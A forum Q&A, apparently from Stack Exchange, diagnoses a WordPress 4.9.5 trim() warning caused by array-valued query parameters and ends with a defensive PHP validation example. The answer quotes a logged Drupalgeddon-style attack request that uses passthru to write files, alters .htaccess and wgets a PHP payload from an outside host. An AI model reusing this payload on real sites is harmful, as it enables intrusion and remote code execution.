
wp query - Wordpress 4.9.5 PHP intermittent warning trim() expects parameter 1 to be string, array given


I am running Wordpress 4.9.5 and occasionally see the following error in my logs.

E_WARNING: trim() expects parameter 1 to be string, array given

The stack trace looks like this, so it's not coming from custom theme code.

in trim called at /var/www/wordpress/html/wp-includes/class-wp-query.php (736)
…::parse_query called at /var/www/wordpress/html/wp-includes/class-wp-query.php (1621)
…ry::get_posts called at /var/www/wordpress/html/wp-includes/class-wp-query.php (3230)
in WP_Query::query called at /var/www/wordpress/html/wp-includes/class-wp.php (599)
in WP::query_posts called at /var/www/wordpress/html/wp-includes/class-wp.php (715)
in WP::main called at /var/www/wordpress/html/wp-includes/functions.php (960)
in wp called at /var/www/wordpress/html/wp-blog-header.php (16)
in require called at /var/www/wordpress/html/index.php (17)

Is this a known/unknown Wordpress bug and is there a fix for it?

asked May 24, 2018 at 2:22 by crmpicco
  • Can you elaborate on what you mean by "bad code"? The stack trace is all pointing to core Wordpress code and no custom code of mine (e.g. in my functions.php or theme files) – crmpicco Commented May 24, 2018 at 3:47
  • @crmpicco Having the same problem, it's the WordPress core that messes up with certain requests: example/?q=/user/… Try this URL on your domain, should trigger the error. As far as I can tell this is a Drupal hack, but not sure. – iSenne Commented Nov 21, 2018 at 7:16
  • @iSenne I'm hoping Wordpress resolve it in a future release. – crmpicco Commented Nov 21, 2018 at 7:17
  • @crmpicco can this be reliably replicated on a clean WordPress install with no plugins using a default theme? – Nathan Johnson Commented Nov 21, 2018 at 15:01
  • Sometimes it's easier and better to take a step back and simply not comment when you don't have constructive input. – Howdy_McGee Commented Nov 28, 2018 at 4:56

1 Answer


I ran into this today. It's a bug. I filed a bug report here:

https://core.trac.wordpress/ticket/46797

The problem is this line of code:

$qv['name'] = trim( $qv['name'] );

Source: https://github/WordPress/wordpress-develop/blob/a0ca5afd8977b5a3857084d9cb1bd345166e2f21/src/wp-includes/class-wp-query.php#L764

A (malicious) user sends a request that looks like:

GET /?q=user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=echo 'Vuln!! patch it Now!' > vuln.htm; echo 'Vuln!!'> sites/default/files/vuln.php; echo 'Vuln!!'> vuln.php; cd sites/default/files/; echo 'AddType application/x-httpd-php .jpg' > .htaccess; wget 'http://40k.waszmann.de/Deutsch/images/up.php'

Such a request makes $qv['name'] an array, not a string.

Needs to be sanitized.
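
The type confusion described in the answer above can be reproduced offline. This is an added example, not part of the original answer and not WordPress core code: `scalar_query_var()` is a hypothetical helper, and the query strings are constructed samples with the parameter values shortened to `x`.

```php
<?php
declare(strict_types=1);

// Constructed sample query strings: a normal slug, and bracket-style
// parameters of the shape shown in the answer (values shortened to "x").
$samples = [
    'name=hello-world',
    'q=user/password&name[%23type]=markup&name[%23markup]=x',
    'name[]=a&name[]=b',
];

/**
 * Hypothetical helper (not a WordPress API): return a trimmed string for a
 * query variable, or '' when the client supplied an array or it is missing.
 */
function scalar_query_var(array $vars, string $key): string
{
    $value = $vars[$key] ?? '';
    if (!is_scalar($value)) {
        return '';   // array given: reject instead of passing it to trim()
    }
    return trim((string) $value);
}

foreach ($samples as $query) {
    // parse_str() applies the same bracket rules PHP uses to build $_GET,
    // so "name[...]" turns the "name" variable into an array.
    parse_str($query, $vars);
    printf(
        "%-55s type=%-6s safe=%s\n",
        $query,
        gettype($vars['name'] ?? null),
        var_export(scalar_query_var($vars, 'name'), true)
    );
}
```

Any code that reads a request parameter and passes it straight to a string function has the same exposure, so the type check belongs wherever the value first enters the application.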
